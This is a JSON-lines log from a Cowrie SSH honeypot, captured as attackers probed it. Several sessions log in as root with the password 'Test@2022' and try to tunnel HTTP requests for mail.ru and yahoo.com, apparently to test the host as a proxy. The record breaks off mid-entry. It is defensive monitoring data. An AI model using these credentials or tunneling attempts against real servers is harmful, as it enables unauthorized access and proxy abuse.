{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.182638Z","src_ip":"77.83.207.83","session":"02033fa38609"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.438352Z","src_ip":"77.83.207.83","session":"02033fa38609"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21548,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:21548","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.490699Z","session":"02033fa38609"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.542047Z","src_ip":"77.83.207.83","session":"02033fa38609"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":28039,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:28039","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.685400Z","session":"02033fa38609"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.736448Z","src_ip":"77.83.207.83","session":"02033fa38609"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":30928,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30928","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.881513Z","session":"02033fa38609"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.932720Z","src_ip":"77.83.207.83","session":"02033fa38609"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.984694Z","src_ip":"77.83.207.83","session":"02033fa38609"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":15948,"dst_ip":"1.2.3.4","dst_port":22,"session":"e10c10aec0b4","protocol":"ssh","message":"New connection: 77.83.207.83:15948 (1.2.3.4:22) [session: e10c10aec0b4]","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.033989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.034780Z","src_ip":"77.83.207.83","session":"e10c10aec0b4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.084957Z","src_ip":"77.83.207.83","session":"e10c10aec0b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.335721Z","src_ip":"77.83.207.83","session":"e10c10aec0b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":18119,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:18119","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.386850Z","session":"e10c10aec0b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.437085Z","src_ip":"77.83.207.83","session":"e10c10aec0b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31863,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31863","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.580719Z","session":"e10c10aec0b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.630837Z","src_ip":"77.83.207.83","session":"e10c10aec0b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":18495,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:18495","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.772847Z","session":"e10c10aec0b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.823559Z","src_ip":"77.83.207.83","session":"e10c10aec0b4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.874918Z","src_ip":"77.83.207.83","session":"e10c10aec0b4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":16036,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1022a1f0e02","protocol":"ssh","message":"New connection: 77.83.207.83:16036 (1.2.3.4:22) [session: f1022a1f0e02]","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.924912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.925566Z","src_ip":"77.83.207.83","session":"f1022a1f0e02"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:25.976828Z","src_ip":"77.83.207.83","session":"f1022a1f0e02"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":48476,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcd6c3389076","protocol":"ssh","message":"New connection: 201.148.180.50:48476 (1.2.3.4:22) [session: bcd6c3389076]","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.004541Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.231811Z","src_ip":"77.83.207.83","session":"f1022a1f0e02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21498,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:21498","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.283685Z","session":"f1022a1f0e02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.335148Z","src_ip":"77.83.207.83","session":"f1022a1f0e02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":1446,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:1446","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.477592Z","session":"f1022a1f0e02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.529051Z","src_ip":"77.83.207.83","session":"f1022a1f0e02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":27126,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:27126","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.673611Z","session":"f1022a1f0e02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.725177Z","src_ip":"77.83.207.83","session":"f1022a1f0e02"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.777884Z","src_ip":"77.83.207.83","session":"f1022a1f0e02"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":16140,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fa139fd0d03","protocol":"ssh","message":"New connection: 77.83.207.83:16140 (1.2.3.4:22) [session: 4fa139fd0d03]","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.827051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.837456Z","src_ip":"77.83.207.83","session":"4fa139fd0d03"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.877676Z","src_ip":"77.83.207.83","session":"4fa139fd0d03"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.947190Z","src_ip":"201.148.180.50","session":"bcd6c3389076"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:50:26.948353Z","src_ip":"201.148.180.50","session":"bcd6c3389076"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:27.130144Z","src_ip":"77.83.207.83","session":"4fa139fd0d03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16558,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:16558","sensor":"my-vps","timestamp":"2025-08-31T03:50:27.182962Z","session":"4fa139fd0d03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:27.233750Z","src_ip":"77.83.207.83","session":"4fa139fd0d03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8388,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8388","sensor":"my-vps","timestamp":"2025-08-31T03:50:27.377012Z","session":"4fa139fd0d03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:27.427481Z","src_ip":"77.83.207.83","session":"4fa139fd0d03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":6804,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:6804","sensor":"my-vps","timestamp":"2025-08-31T03:50:27.568875Z","session":"4fa139fd0d03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:27.619615Z","src_ip":"77.83.207.83","session":"4fa139fd0d03"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:27.671081Z","src_ip":"77.83.207.83","session":"4fa139fd0d03"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":16267,"dst_ip":"1.2.3.4","dst_port":22,"session":"cde3a5744270","protocol":"ssh","message":"New connection: 77.83.207.83:16267 (1.2.3.4:22) [session: cde3a5744270]","sensor":"my-vps","timestamp":"2025-08-31T03:50:27.719085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:27.720353Z","src_ip":"77.83.207.83","session":"cde3a5744270"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd